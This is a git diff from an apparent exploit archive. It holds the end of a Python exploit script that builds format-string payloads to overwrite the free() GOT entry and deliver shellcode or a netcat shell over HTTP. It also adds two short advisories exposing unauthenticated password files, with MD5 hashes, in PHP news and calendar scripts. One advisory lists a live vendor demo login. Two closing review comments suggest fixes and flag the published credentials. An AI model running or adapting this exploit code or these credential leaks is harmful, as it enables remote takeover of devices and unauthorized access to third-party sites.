# Netcat shell + else: + html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata) + except Exception as e: + if not NCSH2: + print "[!] Shellcode delivery failed:",str(e) + sys.exit(1) +# +# Stage two +# + +# +# Building and sending the FMS code to the target +# + print "[i] Building the FMS code..." + + FMScode = do_FMS(rhost,verbose) + + # This is an 'One-Write-Where-And-What' for FMS + # + # Stack Example: + # + # Stack content | Stack address (ASLR) + # + # 0x0 | @0x7e818dbc -> [POP1's] + # 0x0 | @0x7e818dc0 -> [free () GOT address] + # 0x7e818dd0 | @0x7e818dc4>>>>>+ "Write-Where" (%n) + # 0x76f41fb8 | @0x7e818dc8 | -> [POP2's] + # 0x76f3d70c | @0x7e818dcc | -> [BSS shell code address] + # 0x76f55ab8 | @0x7e818dd0<<<<<+ "Write-What" (%n) + # 0x1 | @0x7e818dd4 + # + if not NCSH1 and not NCSH2: + FMScode.AddPOP(POP1) # 1st serie of 'Old Style' POP's + FMScode.AddADDR(GOTint) # GOT Address + FMScode.AddWRITEn(1) # 4 bytes Write-Where +# FMScode.AddWRITElln(1) # Easier to locate while debugging as this will write double word (0x00000000004xxxxx) + + FMScode.AddPOP(POP2) # 2nd serie of 'Old Style' POP's + FMScode.AddADDR(BSSint) # BSS shellcode address + FMScode.AddWRITEn(1) # 4 bytes Write-What +# FMScode.AddWRITElln(1) # Easier to locate while debugging as this will write double word (0x00000000004xxxxx) + + # End of 'One-Write-Where-And-What' + + + # This is an 'Two-Write-Where-And-What' for FMS + # + # Netcat shell and FMS code in same request, we will jump to the SSI function + # We jump over all SSI tagging to end up directly where "xxx" will + # be the string passed on to SSI exec function ('/bin/sh -c', pipe(), vfork() and execv()) + # + # The Trick here is to write lower target address, that we will jump to when calling free(), + # than the FMS has counted up to, by using Two-Write-Where-and-What with two writes to free() GOT + # address with two LSB writes. 
+ # + elif NCSH2: + # + # Direct parameter access for FMS exploitation are really nice and easy to use. + # However, we need to exploit in two stages with two requests. + # (I was trying to avoid this "Two-Stages" so much as possibly in this exploit developement...) + # + # 1. Write "Two-Write-Where", where 2nd is two bytes higher than 1st (this allows us to write to MSB and LSB) + # 2. Write with "Two-Write-What", where 1st (LSB) and 2nd (MSB) "Write-Where" pointing to. + # + # With "new style", we can write with POPs independently as we don't depended of same criteria as in "NCSH1", + # we can use any regular "Stack-to-Stack" pointer as we can freely choose the POP-and-Write. + # [Note the POP1/POP2 (low-high) vs POP3/POP4 (high-low) difference.] + # + # Stack Example: + # + # Stack content | Stack address (ASLR) + # + # 0x7e818dd0 | @0x7e818dc4>>>>>+ 1st "Write-Where" [@Stage One] + # 0x76f41fb8 | @0x7e818dc8 | + # 0x76f3d70c | @0x7e818dcc | + # 0x76f55ab8 | @0x7e818dd0<<<<<+ 1st "Write-What" [@Stage Two] + # 0x1 | @0x7e818dd4 + # [....] + # 0x1c154 | @0x7e818e10 + # 0x7e818e20 | @0x7e818e14>>>>>+ 2nd "Write-Where" [@Stage One] + # 0x76f41fb8 | @0x7e818e18 | + # 0x76f3d70c | @0x7e818e1c | + # 0x76f55758 | @0x7e818e20<<<<<+ 2nd "Write-What" [@Stage Two] + # 0x1 | @0x7e818e24 + # + + FMScode.Add(shell) + + # + # 1st and 2nd "Write-Where" already done in stage one + # + # 1st and 2nd "Write-What" + # + FMScode.AddADDR(GOTint + FirstWhat) # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address. + FMScode.AddDirectParameterN(POP3) # Write with 4 bytes (we want to zero out in MSB) + FMScode.AddADDR(SecondWhat + 3) # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. 
(0x00ZZXXXX) + FMScode.AddDirectParameterHHN(POP4) # Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation + + elif NCSH1: + # Could use direct argument addressing here, but I like to keep "old style" as well, + # as it's another interesting concept. + # + # Two matching stack contents -> stack address in row w/o or max two POP's between, + # is needed to write two bytes higher (MSB). + # + # + # Stack Example: + # + # Stack Content | @Stack Address (ASLR) + # + # 0x9c | @7ef2fde8 -> [POP1's] + # [....] + # 0x1 | @7ef2fdec -> [GOTint address] + #------ + # 0x7ef2fe84 | @7ef2fdf0 >>>>>+ Write 'FirstWhere' (%n) [LSB] + # -> 'XX' | two bytes (Can be one or two POP's as well, by using %2c or %1c%1c as POPer) + # 0x7ef2fe8c | @7ef2fdf4 >>>>>>>>>+ Write 'SecondWhere' (%n) [MSB] + # ------ | | + # [....] -> [POP3's] | | + # 0x7fb99dc | @7ef2fe7c | | + # 0x7ef2fe84 | @7ef2fe80 | | [Count up to 0x2XXXX] + # 0x7ef2ff6a | @7ef2fe84 <<<<<+ | Write 'XXXX' 'FirstWhat' (%n) (0x0002XXXX)) + # -> [POP4's] | + # (nil) | @7ef2fe88 | [Count up to 0x20300] + # 0x7ef2ff74 | @7ef2fe8c <<<<<<<<<+ Write 'ZZ' 'SecondWhat' (%hhn) (0x00ZZXXXX) + + FMScode.Add(shell) + + # Write FirstWhere for 'FirstWhat' + FMScode.AddPOP(POP1) + FMScode.AddADDR(GOTint) # Run up to free() GOT address + FMScode.AddWRITEn(1) + + # Write SecondWhere for 'SecondWhat' + # + # This is special POP with 1 byte, we can maximum POP 2! + # + # This POP sequence is actually no longer used in this part of exploit, was developed to meet the requirement + # for exploitation of 5.2.x and 5.40.x, as there needed to be one POP with maximum of two bytes. + # Kept as reference as we now using direct parameter access AKA 'New Style" for 5.2x/5.4x + # + if POP2 != 0: + # We only want to write 'SecondWhat' two bytes higher at free() GOT + if POP2 > 2: + print "POP2 can't be greater than two!" 
+ sys.exit(1)
+ if POP2 == 1:
+ FMScode.Add("%2c")
+ else:
+ FMScode.Add("%1c%1c")
+ else:
+ FMScode.Add("XX")
+ FMScode.AddWRITEn(1)
+
+ # Write FirstWhat pointed by FirstWhere
+ FMScode.AddPOP(POP3) # Old Style POP's
+ FMScode.AddADDR(FirstWhat) # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address.
+ FMScode.AddWRITEn(1) # Write with 4 bytes (we want to zero out in MSB)
+
+ # Write SecondWhat pointed by SecondWhere
+ FMScode.AddPOP(POP4) # Old Style POP's
+ FMScode.AddADDR(SecondWhat) # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX)
+ FMScode.AddWRITEhhn(1) # Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation
+
+ else:
+ sys.exit(1)
+
+ FMSdata = FMScode.FMSbuild()
+
+ print "[>] StG_2: Writing shellcode address to free() GOT address:",'0x{:08x}'.format(GOThex),"(%d bytes)" % (len(FMSdata))
+
+ # FMS comes here, and calculations start after '=' in the url
+ try:
+ if NCSH1 or NCSH2:
+ html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell
+ else:
+ html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url2 + FMSdata) # MIPS/CRIS shellcode
+ except urllib2.HTTPError as e:
+ print "[!] Payload delivery failed:",str(e)
+ sys.exit(1)
+ except Exception as e:
+ # 1st string returned by HTTP mode, 2nd by HTTPS mode
+ if str(e) == "timed out" or str(e) == "('The read operation timed out',)":
+ print "[i] Timeout! Payload delivered sucessfully!"
+ else:
+ print "[!] Payload delivery failed:",str(e)
+ sys.exit(1)
+
+ if noexploit:
+ print "\n[*] Not exploiting, no shell...\n"
+ else:
+ print "\n[*] All done, enjoy the shell...\n"
+
+#
+# [EOF]
+#
diff --git a/platforms/php/webapps/40126.txt b/platforms/php/webapps/40126.txt
new file mode 100755
index 000000000..0629a68c8
--- /dev/null
+++ b/platforms/php/webapps/40126.txt
@@ -0,0 +1,13 @@
+# Exploit Title: Free News Script User Password Download File
+# Date: 2016-07-18
+# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
+# Vendor Homepage: http://www.newsp.eu/index.php?pt=ns
+# Version: All Version
+# Download Link : http://www.newsp.eu/newsp.zip
+
+Exploit :
+http://site/admin/user.txt
+Admin|e3afed0047b08059d0fada10f400c1e5|1|1|1|1|
+
+Username = Admin
+Password Hash = e3afed0047b08059d0fada10f400c1e5 [MD5]
diff --git a/platforms/php/webapps/40127.txt b/platforms/php/webapps/40127.txt
new file mode 100755
index 000000000..cb131d761
--- /dev/null
+++ b/platforms/php/webapps/40127.txt
@@ -0,0 +1,16 @@
+# Exploit Title: PHP calendar script Password Download File
+# Date: 2016-07-18
+# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
+# Vendor Homepage: http://www.newsp.eu/calendarscript.php?pt=st
+# Version: All Version
+# Download Link : http://www.newsp.eu/calendar.zip
+
+Exploit :
+http://site/user.txt
+Admin|fe01ce2a7fbac8fafaed7c982a04e229
+Password Hash = fe01ce2a7fbac8fafaed7c982a04e229 (demo)[MD5]
+
+Test :
+Exploit : http://www.newsp.eu/demo/user.txt
+Login Url : http://www.newsp.eu/demo/login.php
+Password : demo
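Review bot: The advisory claims `# Version: All Version` but records no version that was actually tested, and it offers no mitigation, so a reader cannot tell what was verified or how to close the hole; I would replace that line with `# Tested on: <exact version tested>` and append `Fix: move admin/user.txt outside the document root, or deny it in the web-server config (e.g. an .htaccess rule denying user.txt)`. The impact should also be stated explicitly: the credential file is served unauthenticated and stores an unsalted MD5, and the value `e3afed0047b08059d0fada10f400c1e5` appears to be the MD5 of the literal string "Admin", which, if confirmed, means a default install leaks a trivially recoverable admin password. The trailing `|1|1|1|1|` fields of the record are left unexplained; if they are permission flags, say so (hedged) rather than leaving the reader to guess.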
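Review bot: The `Test :` section points readers at the vendor's live demo (`http://www.newsp.eu/demo/user.txt`, `login.php`, `Password : demo`), which publishes a third party's working credentials instead of a local reproduction; I would drop those three lines in favour of `# Tested on: <version tested on a local install>`. As with the companion news-script entry, `# Version: All Version` is unverified and no fix is given — a line such as `Fix: keep user.txt outside the document root or deny it via web-server config, and replace unsalted MD5 with password_hash()` belongs here (the script is filed under php, so password_hash() is the natural suggestion, but confirm the target PHP version supports it). The `(demo)` annotation already concedes the stored hash is the unsalted MD5 of a trivial password; state that as the impact rather than leaving it implicit.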